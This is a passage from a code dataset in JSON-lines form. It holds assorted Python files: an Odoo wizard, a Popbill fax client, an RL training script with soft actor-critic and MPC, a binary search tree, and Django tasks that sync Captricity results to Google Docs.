GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\nimport logging\n\nfrom openerp import api, fields, models, _\nfrom openerp.exceptions import MissingError\nfrom openerp.tools.safe_eval import safe_eval\n\n_logger = logging.getLogger(__name__)\n\nclass AssignProgram(models.TransientModel):\n    _name = \"school.assign.program\"\n    _description = \"Assign Program to Student\"\n    \n    year_id = fields.Many2one('school.year', string='Year', default=lambda self: self.env.user.current_year_id, ondelete='cascade')\n    student_id = fields.Many2one('res.partner', string='Students', domain=\"[('student', '=', '1')]\", ondelete='cascade')\n    program_id = fields.Many2one('school.individual_program', string=\"Program\", domain=\"[('student_id', '=', student_id)]\", ondelete='cascade')\n    source_bloc_id = fields.Many2one('school.bloc', string=\"Source Bloc\", ondelete='cascade')\n    \n    @api.multi\n    @api.depends('year_id','student_id','source_bloc_id')\n    def assign_program(self):\n        if self.student_id:\n            _logger.info(\"Assigning program to %s\" % self.student_id.name)\n            program = self.env['school.individual_bloc'].create({'year_id':self.year_id.id,'student_id': self.student_id.id,'source_bloc_id':self.source_bloc_id.id,'program_id':self.program_id.id})\n            program.assign_source_bloc()\n            # Hack to recompute\n            self.student_id._get_student_current_program_id()\n            # Return an action showing the created program\n            action = self.env.ref('school_management.action_individual_bloc_form')\n            result = action.read()[0]\n            result['views'] = [(False, 'form')]\n            result['res_id'] = program.id\n            return result\n        else :\n            context = dict(self._context or {})\n            student_ids = context.get('active_ids')\n            ids = []\n            for student in self.env['res.partner'].browse(student_ids):\n                _logger.info(\"Assigning program to %s\" % student.id)\n                program = self.env['school.individual_bloc'].create({'year_id':self.year_id.id,'student_id': student.id,'source_bloc_id':self.source_bloc_id.id,'program_id':self.program_id.id})\n                program.assign_source_bloc()\n                # Hack to recompute\n                student._get_student_current_program_id()\n                ids.append(program.id)\n            # Return an action showing the created programs\n            action = self.env.ref('school_management.action_individual_bloc_form')\n            result = action.read()[0]\n            result['domain'] = [('id', 'in', ids)]\n            return result\n    \n    ","sub_path":"school_registration/wizard/assign_program.py","file_name":"assign_program.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"538593707","text":"# -*- coding: utf-8 -*-\n# Module for Popbill FAX API. It includes base functionality of the\n# RESTful web service request and parses the json result. It uses the Linkhub module\n# to accomplish authentication APIs.\n#\n# http://www.popbill.com\n# Author : Kim Seongjun (pallet027@gmail.com)\n# Written : 2015-01-21\n# Thanks for your interest. \nfrom datetime import datetime\nfrom .base import PopbillBase,PopbillException,File\n\nclass FaxService(PopbillBase):\n    \"\"\" Popbill FAX API Service Implementation. \"\"\"\n\n    def __init__(self, LinkID, SecretKey):\n        \"\"\"Constructor\n        args\n            LinkID : LinkID issued by Linkhub\n            SecretKey : secret key issued by Linkhub\n        \"\"\"\n        super(self.__class__,self).__init__(LinkID,SecretKey)\n        self._addScope(\"160\")\n    \n    def getURL(self, CorpNum, UserID, ToGo):\n        \"\"\" Popbill URL for FAX-related features \n        args\n            CorpNum : Popbill member business registration number\n            UserID : Popbill member user ID\n            ToGo : string selecting the FAX feature. (BOX - transmission history)\n        return\n            url containing a 30-second security token\n        raise \n            PopbillException\n        \"\"\"\n\n        result = self._httpget('/FAX/?TG=' + ToGo , CorpNum,UserID)\n        return result.url\n\n    def getUnitCost(self,CorpNum):\n        \"\"\" Check the FAX transmission unit cost\n        args\n            CorpNum : Popbill member business registration number\n        return\n            transmission unit cost\n        raise \n            PopbillException\n        \"\"\"\n\n        result = self._httpget('/FAX/UnitCost' ,CorpNum)\n        return int(result.unitCost)\n\n\n    def getFaxResult(self, CorpNum, ReceiptNum, UserID = None):\n        \"\"\" Look up FAX transmission results\n        args\n            CorpNum : Popbill member business registration number\n            ReceiptNum : receipt number issued when the transmission was requested\n            UserID : Popbill member user ID\n        return\n            fax transmission info as list \n        raise \n            PopbillException\n        \"\"\"\n\n        return self._httpget('/FAX/' + ReceiptNum, CorpNum, UserID)\n\n\n    def cancelReserve(self, CorpNum, ReceiptNum, UserID = None):\n        \"\"\" Cancel a reserved FAX transmission\n        args\n            CorpNum : Popbill member business registration number\n            ReceiptNum : receipt number issued by the FAX send request (sendFAX)\n            UserID : Popbill member user ID\n        return\n            processing result. consists of code and message\n        raise \n            PopbillException\n        \"\"\"\n\n        return self._httpget('/FAX/' + ReceiptNum + '/Cancel', CorpNum, UserID)\n    \n\n    def sendFax(self, CorpNum, SenderNum, ReceiverNum, ReceiverName, FilePath, ReserveDT = None, UserID = None):\n        \"\"\" Send a single FAX\n        args\n            CorpNum : Popbill member business registration number\n            SenderNum : sender number \n            ReceiverNum : receiver number\n            ReceiverName : receiver name \n            FilePath : path of the file to send \n            ReserveDT : reservation time (format yyyyMMddHHmmss)\n            UserID : Popbill member user ID\n        return\n            receipt number (receiptNum)\n        raise \n            PopbillException\n        \"\"\"\n        receivers = []\n        receivers.append(FaxReceiver(receiveNum = ReceiverNum,\n                                     receiveName = ReceiverName)\n                        )\n\n        return self.sendFax_multi(CorpNum, SenderNum, receivers, FilePath, ReserveDT, UserID)\n
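    # Illustrative usage (all values below are placeholders, not real credentials):\n    #   faxService = FaxService(LinkID, SecretKey)\n    #   receiptNum = faxService.sendFax(CorpNum, '07012345678', '07087654321', 'Receiver', '/path/to/file.pdf')\n    #   result = faxService.getFaxResult(CorpNum, receiptNum)\n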
\n    def sendFax_multi(self, CorpNum, SenderNum, Receiver, FilePath, ReserveDT = None , UserID = None):\n        \"\"\" Send a FAX (broadcast)\n        args\n            CorpNum : Popbill member business registration number\n            SenderNum : sender number (for broadcast sending)\n            Receiver : receiver number(s) (for broadcast sending)\n            FilePath : path of the file to send \n            ReserveDT : reservation time (format yyyyMMddHHmmss)\n            UserID : Popbill member user ID\n        return\n            receipt number (receiptNum)\n        raise \n            PopbillException\n        \"\"\"\n\n        if SenderNum == None or SenderNum == \"\" :\n            raise PopbillException(-99999999,\"The sender number was not entered.\")\n        if Receiver == None:\n            raise PopbillException(-99999999,\"The receiver information was not entered.\")\n        if not (type(Receiver) is str or type(Receiver) is FaxReceiver or type(Receiver) is list) :\n            raise PopbillException(-99999999,\"'Receiver' argument type error. 'FaxReceiver' or List of 'FaxReceiver'.\")\n        if FilePath == None :\n            raise PopbillException(-99999999,\"The path of the file to send was not entered.\")\n        if not (type(FilePath) is str or type(FilePath) is list) :\n            raise PopbillException(-99999999,\"The file to send must be given as a file path or a list of paths.\")\n        if type(FilePath) is list and (len(FilePath) < 1 or len(FilePath) > 5) :\n            raise PopbillException(-99999999,\"Between 1 and 5 files can be sent.\")\n\n        req = {\"snd\" : SenderNum , \"fCnt\": 1 if type(FilePath) is str else len(FilePath) , \"rcvs\" : [] , \"sndDT\" : None}\n\n        if(type(Receiver) is str): \n            Receiver = FaxReceiver(receiveNum=Receiver)\n        \n        if(type(Receiver) is FaxReceiver):\n            Receiver = [Receiver]\n\n        for r in Receiver:\n            req['rcvs'].append({\"rcv\" : r.receiveNum, \"rcvnm\" : r.receiveName})\n\n        if ReserveDT != None :\n            req['sndDT'] = ReserveDT\n\n        postData = self._stringtify(req)\n\n        if(type(FilePath) is str):\n            FilePath = [FilePath]\n        \n        files = []\n\n        for filePath in FilePath:\n            with open(filePath,\"rb\") as f:\n                files.append(File(fieldName='file',\n                                  fileName=f.name,\n                                  fileData=f.read())\n                            )\n        \n        result = self._httppost_files('/FAX',postData,files,CorpNum,UserID)\n\n        return result.receiptNum\n\n\nclass FaxReceiver(object):\n    def __init__(self,**kwargs):\n        self.__dict__ = dict.fromkeys(['receiveNum','receiveName'])\n        self.__dict__.update(kwargs)","sub_path":"popbill/faxService.py","file_name":"faxService.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"171673226","text":"import gym\n\nimport bonsai\nfrom bonsai_gym_common import GymSimulator, logging_basic_config\n\nENVIRONMENT = 'Acrobot-v1'\nRECORD_PATH = None\n# value grabbed from\n# https://github.com/openai/gym/blob/master/gym/envs/__init__.py\nMAX_EPISODE_LENGTH = 500\n\n\nclass AcrobotSimulator(GymSimulator):\n\n    def __init__(self, env, record_path):\n        GymSimulator.__init__(self, env,\n                              record_path=record_path,\n                              episode_limit=MAX_EPISODE_LENGTH)\n\n    def get_state(self):\n        parent_state = GymSimulator.get_state(self)\n        state_dict = {\"cos_theta0\": parent_state.state[0],\n                      \"sin_theta0\": parent_state.state[1],\n                      \"cos_theta1\": parent_state.state[2],\n                      \"sin_theta1\": parent_state.state[3],\n                      \"theta0_dot\": parent_state.state[4],\n                      \"theta1_dot\": parent_state.state[5]}\n        return bonsai.simulator.SimState(state_dict, parent_state.is_terminal)\n\n\nif __name__ == \"__main__\":\n    logging_basic_config()\n    env = gym.make(ENVIRONMENT)\n    simulator = AcrobotSimulator(env, RECORD_PATH)\n    bonsai.run_for_training_or_prediction(\"acrobot_simulator\", simulator)\n","sub_path":"acrobot_simulator.py","file_name":"acrobot_simulator.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"502658668","text":"import pymysql\nfrom chatbot.config.DatabaseConfig import *\n\ndb = None\n\ntry:\n    # Passwords are no longer entered and managed directly here\n    db = pymysql.connect(\n        host=DB_HOST,\n        user=DB_USER,\n        passwd=DB_PASSWORD,\n        db=DB_NAME,\n        charset='utf8'\n    )\n\n    sql = '''\n    CREATE TABLE IF NOT EXISTS `chatbot_train_data` (\n    `id` INT UNSIGNED NOT NULL AUTO_INCREMENT,\n    `intent` VARCHAR(45) NULL,\n    `ner` VARCHAR(1024) NULL,\n    `query` TEXT NULL,\n    `answer` TEXT NOT NULL,\n    `answer_image` VARCHAR(2048) NULL,\n    PRIMARY KEY (`id`))\n    ENGINE = InnoDB DEFAULT CHARSET = utf8\n    '''\n\n    with db.cursor() as cursor:\n\n        # Run the SQL statement with the cursor object's execute() function\n        cursor.execute(sql)\n\n        # Apply the modified contents to the DB by calling commit() on the\n        # connection object (db).\n        db.commit()\n\nexcept Exception as e:\n    # Print the error details if the DB connection fails\n    print(e)\n\nfinally:\n    # Try to close the connection only if the DB was connected\n    if db is not None:\n        # Close the database server connection\n        db.close()\n        print('table creation and column setup complete')","sub_path":"chatbot/train_tools/qna/create_train_data_table.py","file_name":"create_train_data_table.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"152907988","text":"# Should a binary-search-tree be a reference to a\r\n# network of interconnected BSTNode's?\r\n# And how does that change the shape of the \r\n# insertion process/function?\r\n\r\nclass BSTree:\r\n    def __init__(self, node):\r\n        self._root = node\r\n\r\n    def insert(self, v):\r\n        if self._root is None:\r\n            self._root = BSTNode(v, None, None)\r\n        else:\r\n            self._insert(self._root, v)\r\n\r\n    def _insert(self, t, v):\r\n        if (t.key() < v):\r\n            if (t.rChild() is None):\r\n                t._rChild = BSTNode(v, None, None)\r\n            else:\r\n                self._insert(t.rChild(),v)\r\n        else:\r\n            if(t.lChild() is None):\r\n                t._lChild = BSTNode(v, None, None)\r\n            else:\r\n                self._insert(t.lChild(),v)\r\n    #\r\n    def buildTree(self, values):\r\n        for v in values:\r\n            self.insert(v)\r\n    #\r\n    def inorderPrint(self):\r\n        if self._root is None:\r\n            return\r\n        self._inorderPrint(self._root)\r\n    \r\n    def _inorderPrint(self, treeRoot):\r\n        if treeRoot is None:\r\n            return # i.e., there's nothing to print!\r\n        #\r\n        self._inorderPrint(treeRoot.lChild())\r\n        print (\"value: \", treeRoot.key())\r\n        self._inorderPrint(treeRoot.rChild())\r\n\r\n    def bstDistance(self, v1, v2):\r\n        \"\"\"Calculates the distance, i.e., the number of \"graph edges\" on a path from the node\r\nthat has v1 as its key to the node that has v2 as its key.\r\nThe key insight is that:\r\nthe path from root down to each of the two nodes, v1 and v2, may, in general, have some overlap,\r\ni.e., there may be some edges in common, some overlap, between the root-to-v1 path and \r\nthe root-to-v2 path.\r\nSo, if we just tracked those edges, and calculated those two paths, then calculate the intersection\r\nof those two sets, and subtract the intersection from both root-to-v paths, then we'd have two\r\npaths, the lengths of which add up to the distance between v1 and v2.\r\nBy taking advantage of the extra information bestowed by the binary-search-tree property,\r\nwe don't need to keep track of two root-to-node paths, and then try to calculate their \r\nintersection, etc. 
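(For example, in the tree built below from [10,9,8,5,6,7,3,4,2,1], the deepest common ancestor of 7 and 8 is the node 8 itself, so bstDistance(7, 8) is 0 + 3 = 3: zero hops down to 8 plus three hops down through 5 and 6 to 7.)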
We can deduce the properties of the root-to-node paths from the extra\r\ninformation the binary search tree structure gives to us \"for free.\"\r\n\"\"\"\r\n if v2 < v1:\r\n v1, v2 = v2, v1 # swap them!\r\n #\r\n treeRoot = self._root\r\n #\r\n if treeRoot is None:\r\n return 0 # what is the distance when the tree is \"empty?\"\r\n #\r\n while v2 < treeRoot.key() or treeRoot.key() < v1:\r\n if v2 < treeRoot.key():\r\n treeRoot = treeRoot.lChild()\r\n # i.e., both v1, v2 lie in the left subtree of treeRoot\r\n else:\r\n treeRoot = treeRoot.rChild()\r\n # i.e., both v1, v2 lie in the right subtree of treeRoot\r\n #\r\n # Now, v1 <= treeRoot.key() and treeRoot.key() <= v2\r\n # Assuming that v1 != v2, then:\r\n # treeRoot.key() is the value of the \"deepest common ancestor\";\r\n # v1 lies in the left subtree of treeRoot AND v2 lies in the right subtree of treeRoot;\r\n # If it happens to be the case that:\r\n # v1 == treeRoot.key() and v2 == treeRoot.key()\r\n # then:\r\n # v1 == v2 by transitivity of ==.\r\n # If v1 == treeRoot.key() and treeRoot.key() < v2,\r\n # then the distance between the v1, v2 will simply be the number of hops down from v1 to v2.\r\n # Similarly for v1 < treeRoot.key() and treeRoot.key() == v2, eh?\r\n # \r\n # So, we must calculate the path length from treeRoot down to v1\r\n # and then calculate the path length from treeRoot down to v2:\r\n return self._pathFromRoot(treeRoot, v1) + self._pathFromRoot(treeRoot, v2)\r\n\r\n def _pathFromRoot(self, treeRoot, v):\r\n dist = 0\r\n #\r\n while treeRoot is not None and treeRoot.key() != v:\r\n if treeRoot.key() < v:\r\n treeRoot = treeRoot.rChild()\r\n else:\r\n treeRoot = treeRoot.lChild()\r\n #\r\n dist = dist + 1\r\n #\r\n return dist\r\n\r\nclass BSTNode:\r\n def __init__(self, data, lChild, rChild):\r\n self._data = data\r\n self._lChild = lChild\r\n self._rChild = rChild\r\n\r\n def lChild(self):\r\n return self._lChild\r\n\r\n def rChild(self):\r\n return self._rChild\r\n\r\n def key(self):\r\n return self._data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n myT = BSTree(BSTNode(1,None,None))\r\n #\r\n myT.insert(9)\r\n #\r\n myT.inorderPrint()\r\n #\r\n print (myT.bstDistance(1, 9))\r\n #\r\n myT2 = BSTree(None)\r\n myT2.buildTree([10,9,8,5,6,7,3,4,2,1])\r\n myT2.inorderPrint()\r\n print (myT2.bstDistance(7,8) == 3)\r\n\r\n myT3=BSTree(None)\r\n myT3.buildTree([1,8,9,10,5,6,7,3,4,2])\r\n print (myT3.bstDistance(4,7) == 4)\r\n \r\n","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"637347886","text":"# the following 3 lines are helpful if you have multiple GPUs and want to train\n# agents on multiple GPUs. 
I do this frequently when testing.\n# import os\n# os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\n# os.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\n# python3 main_sac.py mpc=0/1 nsteps=1000 ensemble_size cuda_model cuda_Agent policy comment\n#import pybullet_envs\nimport gym\nimport numpy as np\nfrom sac_torch import Agent\nfrom utils import plot_learning_curve\nimport numpy as np\nfrom modelbuffer import Buffer\nfrom models import Model\nfrom rewardmodel import RewardModel\nimport torch\nfrom normalizer import TransitionNormalizer\nimport matplotlib.pyplot as plt\nimport sys\nfrom mpc_contorller import MPCController\n\nimport logging\nimport datetime\nfrom continuous_cartpole import ContinuousCartPoleEnv\nimport time\n\n\ndef train_epoch(model, buffer, optimizer, batch_size, training_noise_stdev, grad_clip):\n    losses = []\n\n    for tr_states, tr_actions, tr_state_deltas, tr_rewards in buffer.train_batches(batch_size=batch_size):\n        optimizer.zero_grad()\n        loss = model.loss(tr_states, tr_actions, tr_state_deltas,\n                          training_noise_stdev=training_noise_stdev)\n        losses.append(loss.item())\n        loss.backward()\n        torch.nn.utils.clip_grad_value_(model.parameters(), grad_clip)\n        optimizer.step()\n\n    return np.mean(losses)\n\n\ndef train_epoch_reward(rewardmodel, buffer, optimizer, batch_size, training_noise_stdev, grad_clip):\n    losses = []\n    for tr_states, tr_actions, tr_state_deltas, tr_rewards in buffer.train_batches(batch_size=batch_size):\n        optimizer.zero_grad()\n        loss = rewardmodel.loss(tr_states, tr_actions, tr_rewards,\n                                training_noise_stdev=training_noise_stdev)\n\n        losses.append(loss.item())\n        loss.backward()\n        torch.nn.utils.clip_grad_value_(model.parameters(), grad_clip)\n        optimizer.step()\n\n    return np.mean(losses)\n\n\ndef get_optimizer_factory(lr, weight_decay):\n    return lambda params: torch.optim.Adam(params,\n                                           lr=lr,\n                                           weight_decay=weight_decay)\n\n\ndef fit_model(buffer, n_epochs):\n\n    optimizer = get_optimizer_factory(1e-3, 0)(model.parameters())\n    for epoch_i in range(1, n_epochs + 1):\n        tr_loss = train_epoch(model=model, buffer=buffer,\n                              optimizer=optimizer, batch_size=256, training_noise_stdev=0, grad_clip=5)\n\n        modelloss.append(tr_loss)\n\n    optimizer = get_optimizer_factory(1e-3, 0)(rewardmodel.parameters())\n\n    for epoch_i in range(1, n_epochs + 1):\n        tr_loss = train_epoch_reward(rewardmodel=rewardmodel, buffer=buffer,\n                                     optimizer=optimizer, batch_size=256, training_noise_stdev=0, grad_clip=5)\n\n    return model, rewardmodel\n\n\ndef square_mean_error(env, env_evaluate, actions, states, model_sum_reward, horizon, step):\n    env_evaluate.reset()\n    qpos = env.sim.data.qpos.copy()\n    qvel = env.sim.data.qvel.copy()\n    env_evaluate.set_state(qpos, qvel)\n    real_sum_reward = 0\n    for i in range(horizon):\n        obs, reward, done, _ = env_evaluate.step(actions[i])\n        real_sum_reward += reward\n\n        if done:\n            break\n    if not done:\n        state_square_error = np.square(obs - states[-1])\n        state_square_error = state_square_error.sum()\n        state_square_error /= env_evaluate.observation_space.shape[0]\n        reward_error = model_sum_reward - real_sum_reward\n        logging.info('state_square_error: %.3f reward_error: %.3f',\n                     state_square_error, reward_error)\n    env.set_state(qpos, qvel)\n\n\ndef set_log(s):\n    # Change the log level to DEBUG\n    now = datetime.datetime.now()\n    filename = './' + s + 'log/' + 'log_' + \\\n        now.strftime('%Y%m%d_%H%M%S') + '.log'\n    # File used when debugging\n    #filename = './saclog/logger.log'\n    formatter = '%(levelname)s : %(asctime)s : %(message)s'\n\n    logging.basicConfig(filename=filename,\n                        level=logging.DEBUG, 
format=formatter)\n\n\nif __name__ == '__main__':\n\n args = sys.argv\n #env_id = 'LunarLanderContinuous-v2'\n\n # env_id = 'BipedalWalker-v2'\n # env_id = 'AntBulletEnv-v0'\n # env_id = 'InvertedPendulumBulletEnv-v0'\n # env_id = 'CartPoleContinuousBulletEnv-v0'\n\n #env_id = 'MountainCarContinuous-v0'\n\n # env_id = 'CartPole-v1'\n\n #env_id = 'HalfCheetah-v2'\n # env_id='Ant-v2'\n env_id = args[6]\n env = gym.make(env_id)\n env_evaluate = gym.make(env_id)\n env_id = 'Continuous_CartPole'\n env = ContinuousCartPoleEnv()\n use_mpc = int(args[1])\n\n if use_mpc == 0:\n set_log('sac')\n logging.info('method: %s', 'Soft-Actor Critic')\n else:\n set_log('mpc')\n logging.info('method: %s', 'Model Predictive Contorol')\n # mpc=MPC()\n n_steps = int(args[2])\n n_games = 1\n ensemble_size = int(args[3])\n n_spaces = env.observation_space.shape[0]\n\n n_actions = env.action_space.shape[0]\n print('spaces %d actions %d' % (n_spaces, n_actions))\n logging.info('parameter n_steps: %d ensemble_size: %d env: %s',\n n_steps, ensemble_size, env_id)\n buffer = Buffer(n_spaces, n_actions, 1, ensemble_size, 1000000)\n model_cuda = args[4]\n model = Model(model_cuda, n_actions, n_spaces,\n 512, 3, ensemble_size=ensemble_size)\n rewardmodel = RewardModel(model_cuda, n_actions, n_spaces, 1,\n 512, 3, ensemble_size=ensemble_size)\n modelloss = []\n rewards = []\n agent_cuda = args[5]\n agent = Agent(agent_cuda, alpha=0.0003, beta=0.0003, reward_scale=2, env_id=env_id,\n input_dims=env.observation_space.shape, tau=0.005,\n env=env, batch_size=256, layer1_size=256, layer2_size=256,\n n_actions=n_actions)\n horizon = int(args[9])\n num_control_samples = 100\n num_elite = 30\n grad_steps = 10\n mpc = MPCController(agent_cuda, env, horizon=horizon, num_control_samples=num_control_samples, num_elite=num_elite, agent=agent,\n model=model, rewardmodel=rewardmodel, model_buffer=buffer)\n\n if use_mpc == 1:\n logging.info('mpc horizon: %d mpc_samples: %d elite_sample: %d grad_steps: %d',\n horizon, num_control_samples, num_elite, grad_steps)\n function_name = args[7]\n\n if function_name == 'random':\n func = mpc.get_action_random\n elif function_name == 'policy':\n func = mpc.get_action_policy\n elif function_name == 'policy-kl':\n func = mpc.get_action_policy_kl\n elif function_name == 'policy-kl2':\n func = mpc.get_action_policy_kl_2\n elif function_name == 'policy_double':\n func = mpc.get_action_policy\n elif function_name == 'cem':\n func = mpc.get_action_cem\n elif function_name == 'policy-entropy':\n func = mpc.get_action_policy_entropy\n elif function_name == 'policy-kl4':\n func = mpc.get_action_policy_kl_4\n elif function_name == 'policy-gamma':\n func = mpc.get_action_policy_gamma\n elif function_name == 'policy-mean':\n func = mpc.get_action_policy_mean\n elif function_name == 'policy-kl5':\n func = mpc.get_action_policy_kl_5\n elif function_name == 'proposed_cem':\n func = mpc.get_action_cem_proposed\n\n else:\n print('error')\n exit()\n logging.info('mpc_function %s', function_name)\n comment = args[8]\n if comment is not None:\n logging.info(comment)\n for nsteps in range(n_steps):\n best_score = env.reward_range[0]\n score_history = []\n load_checkpoint = True\n steps = 0\n observation = env.reset()\n done = False\n score = 0\n ep_length = 0\n\n if not use_mpc:\n while not done:\n action = agent.choose_action(observation)\n observation_, reward, done, info = env.step(action)\n #print(env.sim.data.qpos, env.sim.data.qvel)\n steps += 1\n agent.remember(observation, action,\n reward, observation_, done)\n 
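# Each transition is stored twice: agent.remember() above feeds the SAC\n                # replay memory, while buffer.add() below fills the model buffer that\n                # fit_model() later uses to train the dynamics and reward ensembles.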
buffer.add(state=observation, action=action,\n                           next_state=observation_, reward=reward)\n                agent.learn()\n                score += reward\n                if steps % 100 == 0:\n                    print(steps)\n                observation = observation_\n                # env.render()\n                ep_length += 1\n                # time.sleep(0.1)\n        else:\n            model, rewardmodel = fit_model(buffer, grad_steps)\n            if function_name == 'policy_double':\n                if nsteps >= 0.1 * n_steps:\n                    func = mpc.get_action_policy_kl_2\n            while not done:\n                # return best_action ,,actions, states, sum_rewards\n                #action, actions, states, sum_rewards = func(observation)\n                action = func(observation)\n                observation_, reward, done, info = env.step(action)\n                agent.remember(observation, action,\n                               reward, observation_, done)\n                buffer.add(state=observation, action=action,\n                           next_state=observation_, reward=reward)\n                agent.learn()\n                env.render()\n                # print(rewardmodel.forward_all(torch.from_numpy(\n                #     observation).float(), torch.from_numpy(action).float()))\n                if steps % 100 == 0:\n                    # square_mean_error(env, env_evaluate, actions,\n                    #                   states, sum_rewards, horizon, steps)\n\n                    print(steps)\n\n                steps += 1\n                score += reward\n                observation = observation_\n\n        score_history.append(score)\n        avg_score = np.mean(score_history[-100:])\n        rewards.append(avg_score)\n        if avg_score > best_score:\n            best_score = avg_score\n            '''if not load_checkpoint:\n                self.save_models()'''\n\n        print('episode ', nsteps, 'score %.1f' % score,\n              'trailing 100 games avg %.1f' % avg_score,\n              'steps %d' % steps,\n              'ep_length %d' % ep_length\n              )\n        logging.info('episode: %d score: %.1f 100 games avg: %.1f steps %d ',\n                     nsteps, score, avg_score, steps,)\n","sub_path":"main_sac.py","file_name":"main_sac.py","file_ext":"py","file_size_in_byte":10423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"71589192","text":"'''Create the logger class'''\nimport os\nimport sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\n\nimport logging\nfrom conf import settings\n\nclass Logger(object):\n\n    def __init__(self, loggerName=None, logger_dbj=None):\n        self.name = loggerName\n        self.logger = logger_dbj\n\n    def create_logger(self, level=logging.DEBUG):\n        '''Create the logger object'''\n        self.logger = logging.getLogger(self.name)\n        self.logger.setLevel(level)\n\n    def set_formatter(self, formatterStr):\n        '''Set the log format'''\n        formatter = logging.Formatter(formatterStr)\n        return formatter\n\n\n    def create_console_handler(self, level=logging.DEBUG, formatterStr=None):\n        '''Create a console handler'''\n        # Create the console handler object\n        ch = logging.StreamHandler()\n        ch.setLevel(level)\n\n        # Set the log format\n        formatter = self.set_formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n        ch.setFormatter(formatter)\n\n        # Add the configured handler to the logger\n        self.logger.addHandler(ch)\n\n    def create_file_handler(self, level=logging.DEBUG, formatterStr=None):\n        '''Create a file handler'''\n        # Create the file handler object\n        fh = logging.FileHandler(settings.LOG_TYPES['operator'])\n        fh.setLevel(settings.LOG_LEVEL)\n\n        # Set the log format\n        formatter = self.set_formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n        fh.setFormatter(formatter)\n\n        # Add the configured handler to the logger\n        self.logger.addHandler(fh)","sub_path":"day12-mysql及sqlalchemy/core/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"556669412","text":"from django.conf import settings\nfrom celery.task import task\nimport cStringIO as StringIO\nimport re\nimport csv\nimport os\nimport urlparse\nimport urllib2\nimport 
httplib\nimport httplib2\nimport tempfile\nimport simplejson\nimport math\n\nfrom django.contrib.auth.models import User\n\nfrom oauth2client.django_orm import Storage\nimport gdata.docs\nimport gdata.docs.client\nimport gdata.docs.data\nfrom captricity_cloud_io.models import CredentialsModel, FlowModel, UserProfile\n\ndef upload_to_captricity_by_url(source_urls, job_id, user_profile_id):\n _upload_to_captricity_by_url.delay(source_urls, job_id, user_profile_id)\n\n@task(ignore_result=True)\ndef _upload_to_captricity_by_url(source_urls, job_id, user_profile_id):\n \"\"\"Pull resource from url and upload to captricity\"\"\"\n client = UserProfile.objects.get(id=user_profile_id).get_captricity_client()\n # First find out how many pages there are in the document, so that we know how to group the list of images into image sets\n page_count = client.read_job(job_id)['document']['sheet_count']\n # Assume the images are in order, neatly sorted into image sets\n for i in range(int(math.ceil(len(source_urls) / float(page_count)))):\n # For each group of images in a image set, create the instance set on the captricity server\n iset = client.create_instance_sets(job_id, {'name':'iset '+str(i)})\n # Then upload in order, assuming they are in page number order\n for page_number,file_data in enumerate(source_urls[(i*page_count):(i*page_count)+page_count]):\n # Since we can't upload a url, and since the captricity python client is not compatible with \"file-like\" objects, so first retrieve the file from the url on to disk, then pass the local file to captricity python client to upload\n os_handle, path = tempfile.mkstemp()\n os.close(os_handle)\n f = open(path, \"w+\")\n f.write(urllib2.urlopen(file_data['url']).read())\n f.close()\n client.create_instance_set_instances(iset['id'], {'page_number': page_number, 'image_file':open(path)})\n os.remove(path)\n\ndef upload_to_google(job_id, user_id):\n _upload_to_google.delay(job_id, user_id)\n\n@task(ignore_result=True)\ndef _upload_to_google(job_id, user_id):\n \"\"\"Pull csv output from Captricity and pass onto google spreadsheets\"\"\"\n user = User.objects.get(id=user_id)\n\n # Get csv\n # We must first get the job, then get all datasets associated with the job. This is so that we get the metadata for datasets so we know which one to pull from captricity. We always pick the first one in the list. 
Once selected and we know the dataset id, retrieve the csv file\n client = user.get_profile().get_captricity_client()\n csv_data = client.read_job_results_csv(job_id)\n\n gclient = gdata.docs.client.DocsClient()\n gclient = _authorize_client(user, gclient)\n\n # write csv to file and upload to google spreadsheets\n os_handle, path = tempfile.mkstemp(suffix=\".csv\")\n os.close(os_handle)\n f = open(path, \"w+\")\n csv_fake_file = StringIO.StringIO(csv_data)\n csv_reader = csv.reader(csv_fake_file)\n field_names = csv_reader.next()\n csv_dict_reader = csv.DictReader(csv_fake_file, fieldnames=field_names)\n csv_dict_writer = csv.DictWriter(f, fieldnames=field_names)\n headers = dict( (n,n) for n in field_names )\n csv_dict_writer.writerow(headers)\n for row in csv_dict_reader:\n csv_dict_writer.writerow(row)\n f.close()\n\n csv_gfile = gdata.docs.data.Resource(type='spreadsheet', title='Sample Captricity CSV Results')\n media = gdata.data.MediaSource()\n media.SetFileHandle(path, 'text/csv')\n gfile = gclient.CreateResource(csv_gfile, media=media)\n\ndef _authorize_client(user, gclient):\n storage = Storage(CredentialsModel, 'id', user, 'credential')\n credential = storage.get()\n if credential is None or credential.invalid == True:\n raise Exception(\"Invalid credentials\")\n gclient = credential.authorize_gclient(gclient)\n return gclient\n\n","sub_path":"captricity_cloud_io/captricity_cloud_io/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"28160229","text":"#!/usr/bin/env python3\nfrom collections import defaultdict\nfrom functools import partial, reduce\nimport math\nfrom operator import mul\nimport os\nimport 